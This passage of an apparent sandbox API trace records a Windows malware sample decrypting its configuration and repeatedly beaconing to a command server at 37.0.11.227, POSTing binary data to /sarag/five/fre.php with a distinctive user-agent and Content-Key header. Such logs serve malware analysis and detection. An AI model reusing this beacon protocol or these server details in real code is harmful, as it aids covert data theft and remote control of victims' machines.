hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab390 | out: hHeap=0x690000) returned 1 [0284.715] GetProcessHeap () returned 0x690000 [0284.715] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0284.715] GetProcessHeap () returned 0x690000 [0284.715] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0284.715] GetProcessHeap () returned 0x690000 [0284.716] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3088 | out: hHeap=0x690000) returned 1 [0284.716] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1710) returned 0x900 [0284.718] Sleep (dwMilliseconds=0xea60) [0284.719] GetProcessHeap () returned 0x690000 [0284.719] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0284.720] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0284.720] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0284.725] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0284.725] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aee58) returned 1 [0284.733] GetProcessHeap () returned 0x690000 [0284.733] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a88b0 [0284.734] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0284.734] CryptImportKey (in: hProv=0x6aee58, pbData=0x6a88b0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0284.741] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0284.741] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0284.742] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0284.742] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0284.742] GetProcessHeap () returned 0x690000 [0284.743] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a88b0 | out: hHeap=0x690000) returned 1 [0284.743] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0284.744] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0284.744] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0284.744] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0284.745] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0284.745] CryptReleaseContext (hProv=0x6aee58, dwFlags=0x0) returned 1 [0284.745] GetProcessHeap () returned 0x690000 [0284.745] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0284.746] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0284.746] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0284.747] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0284.747] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0284.748] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0284.748] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0284.749] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0284.749] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0284.749] GetProcessHeap () returned 0x690000 [0284.749] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0284.749] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0284.749] GetProcessHeap () returned 0x690000 [0284.749] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0284.750] GetProcessHeap () returned 0x690000 [0284.750] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0284.750] GetProcessHeap () returned 0x690000 [0284.750] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0284.750] GetProcessHeap () returned 0x690000 [0284.750] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4418 [0284.751] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0284.751] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0284.756] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0284.756] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aed48) returned 1 [0284.761] GetProcessHeap () returned 0x690000 [0284.761] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a87f0 [0284.761] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0284.762] CryptImportKey (in: hProv=0x6aed48, pbData=0x6a87f0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d628) returned 1 [0284.762] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0284.763] CryptSetKeyParam (hKey=0x69d628, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0284.763] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0284.764] CryptSetKeyParam (hKey=0x69d628, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0284.764] GetProcessHeap () returned 0x690000 [0284.764] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a87f0 | out: hHeap=0x690000) returned 1 [0284.765] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0284.765] CryptDecrypt (in: hKey=0x69d628, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4418, pdwDataLen=0x19fcfc | out: pbData=0x6a4418, pdwDataLen=0x19fcfc) returned 1 [0284.766] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0284.766] CryptDestroyKey (hKey=0x69d628) returned 1 [0284.766] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0284.767] CryptReleaseContext (hProv=0x6aed48, dwFlags=0x0) returned 1 [0284.767] GetProcessHeap () returned 0x690000 [0284.767] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0284.767] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0284.768] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0284.768] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0284.769] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0284.770] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0284.770] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0284.771] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0284.771] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0284.772] GetProcessHeap () returned 0x690000 [0284.772] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a2f20 [0284.772] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a3088*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0284.772] GetProcessHeap () returned 0x690000 [0284.772] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab410 [0284.772] socket (af=2, type=1, protocol=6) returned 0x904 [0284.772] connect (s=0x904, name=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0284.797] FreeAddrInfoW (pAddrInfo=0x6a3088*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0284.797] GetProcessHeap () returned 0x690000 [0284.798] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aecc0 [0284.798] GetProcessHeap () returned 0x690000 [0284.798] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b97c0 [0284.798] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0284.800] wvsprintfA (in: param_1=0x6b97c0, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0284.800] GetProcessHeap () returned 0x690000 [0284.800] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6afc80 [0284.800] GetProcessHeap () returned 0x690000 [0284.801] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b97c0 | out: hHeap=0x690000) returned 1 [0284.801] GetProcessHeap () returned 0x690000 [0284.801] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4730 [0284.801] GetProcessHeap () returned 0x690000 [0284.801] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b97c0 [0284.802] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0284.803] wvsprintfA (in: param_1=0x6b97c0, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0284.803] GetProcessHeap () returned 0x690000 [0284.803] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0284.803] GetProcessHeap () returned 0x690000 [0284.803] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b97c0 | out: hHeap=0x690000) returned 1 [0284.803] send (s=0x904, buf=0x6ad508*, len=242, flags=0) returned 242 [0284.804] send (s=0x904, buf=0x6aba40*, len=159, flags=0) returned 159 [0284.804] GetProcessHeap () returned 0x690000 [0284.804] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0284.804] recv (in: s=0x904, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0284.875] GetProcessHeap () returned 0x690000 [0284.876] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0284.876] GetProcessHeap () returned 0x690000 [0284.876] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0284.876] GetProcessHeap () returned 0x690000 [0284.877] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6afc80 | out: hHeap=0x690000) returned 1 [0284.877] GetProcessHeap () returned 0x690000 [0284.877] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aecc0 | out: hHeap=0x690000) returned 1 [0284.878] closesocket (s=0x904) returned 0 [0284.878] GetProcessHeap () returned 0x690000 [0284.878] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab410 | out: hHeap=0x690000) returned 1 [0284.878] GetProcessHeap () returned 0x690000 [0284.878] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0284.879] GetProcessHeap () returned 0x690000 [0284.879] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4418 | out: hHeap=0x690000) returned 1 [0284.879] GetProcessHeap () returned 0x690000 [0284.879] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2f20 | out: hHeap=0x690000) returned 1 [0284.879] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1718) returned 0x904 [0284.881] Sleep (dwMilliseconds=0xea60) [0284.882] GetProcessHeap () returned 0x690000 [0284.882] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0284.883] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0284.883] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0284.888] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0284.888] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6af100) returned 1 [0284.893] GetProcessHeap () returned 0x690000 [0284.893] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8970 [0284.894] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0284.894] CryptImportKey (in: hProv=0x6af100, pbData=0x6a8970, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69cfe8) returned 1 [0284.894] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0284.895] CryptSetKeyParam (hKey=0x69cfe8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0284.895] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0284.896] CryptSetKeyParam (hKey=0x69cfe8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0284.896] GetProcessHeap () returned 0x690000 [0284.896] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8970 | out: hHeap=0x690000) returned 1 [0284.900] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0284.900] CryptDecrypt (in: hKey=0x69cfe8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0284.901] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0284.901] CryptDestroyKey (hKey=0x69cfe8) returned 1 [0284.902] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0284.902] CryptReleaseContext (hProv=0x6af100, dwFlags=0x0) returned 1 [0284.902] GetProcessHeap () returned 0x690000 [0284.902] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0284.903] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0284.903] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0284.903] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0284.904] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0284.904] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0284.905] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0284.906] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0284.906] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0284.906] GetProcessHeap () returned 0x690000 [0284.906] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a2f20 [0284.906] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0284.906] GetProcessHeap () returned 0x690000 [0284.907] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2f20 | out: hHeap=0x690000) returned 1 [0284.907] GetProcessHeap () returned 0x690000 [0284.907] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0284.908] GetProcessHeap () returned 0x690000 [0284.908] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0284.908] GetProcessHeap () returned 0x690000 [0284.908] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4148 [0284.909] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0284.909] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0284.913] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0284.914] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6af188) returned 1 [0284.918] GetProcessHeap () returned 0x690000 [0284.918] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a87f0 [0284.919] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0284.919] CryptImportKey (in: hProv=0x6af188, pbData=0x6a87f0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0284.920] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0284.920] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0284.921] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0284.921] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0284.921] GetProcessHeap () returned 0x690000 [0284.922] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a87f0 | out: hHeap=0x690000) returned 1 [0284.922] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0284.922] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4148, pdwDataLen=0x19fcfc | out: pbData=0x6a4148, pdwDataLen=0x19fcfc) returned 1 [0284.923] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0284.924] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0284.924] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0284.924] CryptReleaseContext (hProv=0x6af188, dwFlags=0x0) returned 1 [0284.924] GetProcessHeap () returned 0x690000 [0284.924] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0284.925] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0284.925] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0284.926] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0284.926] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0284.927] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0284.927] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0284.928] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0284.928] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0284.928] GetProcessHeap () returned 0x690000 [0284.928] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a3088 [0284.928] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a2f20*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0284.928] GetProcessHeap () returned 0x690000 [0284.928] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab4f0 [0284.928] socket (af=2, type=1, protocol=6) returned 0x908 [0284.929] connect (s=0x908, name=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0284.952] FreeAddrInfoW (pAddrInfo=0x6a2f20*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0284.952] GetProcessHeap () returned 0x690000 [0284.952] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aeee0 [0284.952] GetProcessHeap () returned 0x690000 [0284.952] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b97c0 [0284.953] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0284.954] wvsprintfA (in: param_1=0x6b97c0, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0284.954] GetProcessHeap () returned 0x690000 [0284.954] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6af980 [0284.954] GetProcessHeap () returned 0x690000 [0284.955] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b97c0 | out: hHeap=0x690000) returned 1 [0284.955] GetProcessHeap () returned 0x690000 [0284.955] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4730 [0284.955] GetProcessHeap () returned 0x690000 [0284.955] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b97c0 [0284.956] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0284.956] wvsprintfA (in: param_1=0x6b97c0, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0284.956] GetProcessHeap () returned 0x690000 [0284.956] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0284.956] GetProcessHeap () returned 0x690000 [0284.957] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b97c0 | out: hHeap=0x690000) returned 1 [0284.957] send (s=0x908, buf=0x6ad508*, len=242, flags=0) returned 242 [0284.958] send (s=0x908, buf=0x6aba40*, len=159, flags=0) returned 159 [0284.958] GetProcessHeap () returned 0x690000 [0284.958] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0284.958] recv (in: s=0x908, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0285.033] GetProcessHeap () returned 0x690000 [0285.034] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0285.034] GetProcessHeap () returned 0x690000 [0285.034] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0285.034] GetProcessHeap () returned 0x690000 [0285.034] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6af980 | out: hHeap=0x690000) returned 1 [0285.034] GetProcessHeap () returned 0x690000 [0285.034] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aeee0 | out: hHeap=0x690000) returned 1 [0285.034] closesocket (s=0x908) returned 0 [0285.035] GetProcessHeap () returned 0x690000 [0285.035] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab4f0 | out: hHeap=0x690000) returned 1 [0285.035] GetProcessHeap () returned 0x690000 [0285.035] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0285.036] GetProcessHeap () returned 0x690000 [0285.036] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4148 | out: hHeap=0x690000) returned 1 [0285.036] GetProcessHeap () returned 0x690000 [0285.036] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3088 | out: hHeap=0x690000) returned 1 [0285.036] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x171c) returned 0x908 [0285.038] Sleep (dwMilliseconds=0xea60) [0285.039] GetProcessHeap () returned 0x690000 [0285.039] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0285.040] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0285.040] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0285.045] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0285.046] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, 